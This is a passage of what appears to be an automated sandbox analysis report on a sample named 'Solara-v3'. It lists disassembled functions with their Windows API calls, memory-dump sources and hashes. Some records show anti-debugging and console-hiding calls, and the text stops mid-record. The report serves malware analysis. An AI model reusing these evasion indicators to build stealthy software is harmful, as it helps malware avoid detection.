                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D021A71E0121A9FDF14CFA9C8816AEBBB1FF49318F248269E519E7341D731AE45CB90
                                                                                                                                                                                                                                              Function 00CB1FE9 Relevance: 6.2, APIs: 4, Instructions: 205COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CB20D9
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileFindFirst
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1974802433-0
                                                                                                                                                                                                                                              • Opcode ID: d5b1f4383423f2b610774718c1ead0d0707a80aba962403c813e52df6aa47425
                                                                                                                                                                                                                                              • Instruction ID: 910e29a15996c044ae38819d7c7d2a2455511321fc5fa2925f1b3c698b3a7c2c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d5b1f4383423f2b610774718c1ead0d0707a80aba962403c813e52df6aa47425
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A71D0B1905169AFDF21AF38DC89AFEBBB9AB05300F1442D9E559A3211DB318E85DF10
                                                                                                                                                                                                                                              Function 00C9F8E9 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00C9F8F5
                                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 00C9F9C1
                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C9F9DA
                                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 00C9F9E4
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 254469556-0
                                                                                                                                                                                                                                              • Opcode ID: 374b088efc8bf964d2059e943881734d3812eef64262f716f18cf8da73b7b994
                                                                                                                                                                                                                                              • Instruction ID: 45519c451c2150b30e61416cf4319c1707b1c724b6a2b04d3597556eef4b2d79
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 374b088efc8bf964d2059e943881734d3812eef64262f716f18cf8da73b7b994
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2931F775D0122D9BDF21DFA4D949BCDBBB8AF08300F1041EAE40DAB290EB719B858F45
                                                                                                                                                                                                                                              Function 00CBAAE2 Relevance: 12.2, APIs: 8, Instructions: 248COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 127012223-0
                                                                                                                                                                                                                                              • Opcode ID: b608f18d578ab03d40588e7bd709b863bd471a4b95cab0adef1f0c866427225d
                                                                                                                                                                                                                                              • Instruction ID: baa90513af75e60df0bf795bd0072724dc61c910314f7f13e4015ec782ef0c4e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b608f18d578ab03d40588e7bd709b863bd471a4b95cab0adef1f0c866427225d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B771D87290020AABDF319F64CC41FEF7BBADF45310F290059E9A4A7192E7359E419792
                                                                                                                                                                                                                                              Function 00C9FE29 Relevance: 12.2, APIs: 8, Instructions: 177COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 00C9FE70
                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00C9FE9C
                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 00C9FEDB
                                                                                                                                                                                                                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C9FEF8
                                                                                                                                                                                                                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00C9FF37
                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00C9FF54
                                                                                                                                                                                                                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00C9FF96
                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00C9FFB9
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2040435927-0
                                                                                                                                                                                                                                              • Opcode ID: 45fb3afe7c14b39a0f3d3d5fda312c7986fe1e6cdf6589a7077fe6c9c0b13f2c
                                                                                                                                                                                                                                              • Instruction ID: 6a3fe445a5f90fe5cd29ca477b17a74fb524b321a2a13b155bc493647320846c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 45fb3afe7c14b39a0f3d3d5fda312c7986fe1e6cdf6589a7077fe6c9c0b13f2c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 63518C7260021AAFEF205FA1CC49FAA7BF9EF41754F244439F925DA1A0D730CD129B60
                                                                                                                                                                                                                                              Function 00CAEE76 Relevance: 10.8, APIs: 7, Instructions: 329COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _strrchr
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3213747228-0
                                                                                                                                                                                                                                              • Opcode ID: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
                                                                                                                                                                                                                                              • Instruction ID: 4617277c9166d252428a5f83436a84e547114d712b0b6fd9611559e9971439a8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 72B14872A003579FDB118FA4CC81BEEBBA5EF56318F144169E954AB382D6749E02C7E0
                                                                                                                                                                                                                                              Function 00CA0D40 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00CA0D77
                                                                                                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00CA0D7F
                                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00CA0E08
                                                                                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00CA0E33
                                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00CA0E88
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                                              • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                              • Opcode ID: 1c69d782505133d37833c090693762b546f8ece3e9a777f53f59d032bbc95b7a
                                                                                                                                                                                                                                              • Instruction ID: 0ffe21d563fef630f30f9d8d35780f3cad4bc6870d1c10a84fb02c25c219f177
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c69d782505133d37833c090693762b546f8ece3e9a777f53f59d032bbc95b7a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 54410730E0021E9BCF10DF68C885A9E7BB5AF46358F248555F9155B393D731AE11DB90
                                                                                                                                                                                                                                              Function 00C924B0 Relevance: 10.6, APIs: 7, Instructions: 83threadCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetConsoleWindow.KERNEL32 ref: 00C924DD
                                                                                                                                                                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 00C924E6
                                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00C92524
                                                                                                                                                                                                                                                • Part of subcall function 00C9F11D: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,00C9253A,?,?,00000000), ref: 00C9F129
                                                                                                                                                                                                                                                • Part of subcall function 00C9F11D: GetExitCodeThread.KERNEL32(?,00000000,?,?,00C9253A,?,?,00000000), ref: 00C9F142
                                                                                                                                                                                                                                                • Part of subcall function 00C9F11D: CloseHandle.KERNEL32(?,?,?,00C9253A,?,?,00000000), ref: 00C9F154
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C92567
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C92578
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C92589
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C9259A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Cpp_errorThrow_std::_$ThreadWindow$CloseCodeConsoleCurrentExitHandleObjectShowSingleWait
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3956949563-0
                                                                                                                                                                                                                                              • Opcode ID: 7ded8bffeb425c4ed5a1121194a0f2db60fa69d4bef1a00da31ec623c278511f
                                                                                                                                                                                                                                              • Instruction ID: b14a5c59f468ddd3f19eddd5ecbd37838070bdc5bb7a8d7dcf1ea6b8bbe56192
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7ded8bffeb425c4ed5a1121194a0f2db60fa69d4bef1a00da31ec623c278511f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 862176F2D40215ABDF10EFD49D0AB9EBAB4BF04710F080169F51876291E7B59A14CBE6
                                                                                                                                                                                                                                              Function 00CACF0B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,?,?,?,BB40E64E,?,00CAD01A,00C91170,00C9AA08,?,?), ref: 00CACFCC
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                                                              • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                              • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                              • Opcode ID: 2790d3a78368be15c2a3f4c40c4ef0f4a43a5e4e57c4a5dcf967c2165d1e5c8c
                                                                                                                                                                                                                                              • Instruction ID: 53d84e4c08df3216ab2efc087667f7002da748d55771617ac851ba7751b2f167
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2790d3a78368be15c2a3f4c40c4ef0f4a43a5e4e57c4a5dcf967c2165d1e5c8c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F21E731A01312EFC7319BE5DC81F6E7769DB56768F250161F926A7290DB30EE00C6D0
                                                                                                                                                                                                                                              Function 00CA0080 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 15libraryloaderCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00CA0086
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00CA0094
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00CA00A5
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                              • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                                                                                                                                              • API String ID: 667068680-1047828073
                                                                                                                                                                                                                                              • Opcode ID: c880fdf94e2cdc7ad2c8fe2cc696eab4ff874da8e31195276efff2317a950719
                                                                                                                                                                                                                                              • Instruction ID: 0de4e9b997e5fd6b0e9685be1fa13a83a0c1b091f76c41c46dd3568c502bcfd8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c880fdf94e2cdc7ad2c8fe2cc696eab4ff874da8e31195276efff2317a950719
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C1D0C7315412106B83109FB4FD0DFCD3EB9FA09711311816BF445D2760DF7545018758
                                                                                                                                                                                                                                              Function 00CB4F81 Relevance: 9.3, APIs: 6, Instructions: 292COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 99eb8bcc9c90e2132c687cdba1e7bfa36d9d66c6c08e0eab56e052e072c06160
                                                                                                                                                                                                                                              • Instruction ID: 7c466a466b04c61ec36f489d3a4ff630beb2517734b73c1ecbcf4745b183cd38
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 99eb8bcc9c90e2132c687cdba1e7bfa36d9d66c6c08e0eab56e052e072c06160
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4AB12470E08A499FDB05DFA9D881BEEBBB4BF46304F144258F511AB392C7719E41CBA1
                                                                                                                                                                                                                                              Function 00C99B30 Relevance: 9.1, APIs: 6, Instructions: 125COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C99C97
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C99CA8
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C99CBC
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C99CDD
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C99CEE
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C99D06
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Cpp_errorThrow_std::_
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2134207285-0
                                                                                                                                                                                                                                              • Opcode ID: 0bac659b62ddd5e00b6e7ff89eaefbc1eb09212985416604bf6332b567dab384
                                                                                                                                                                                                                                              • Instruction ID: e7719b9e1c8a020963ba341ce1e3916c9e2f722c28e65b6a491fc010db7951b6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0bac659b62ddd5e00b6e7ff89eaefbc1eb09212985416604bf6332b567dab384
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C41A0B1900740DBDF30DB698D0A7ABB7F4FF45320F18062DD57A26291D771AA04CBA2
                                                                                                                                                                                                                                              Function 00CAACE7 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00CAACDE,00CA0760,00C9B77F,BB40E64E,?,?,?,?,00CBBFCA,000000FF), ref: 00CAACF5
                                                                                                                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00CAAD03
                                                                                                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CAAD1C
                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,00CAACDE,00CA0760,00C9B77F,BB40E64E,?,?,?,?,00CBBFCA,000000FF), ref: 00CAAD6E
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
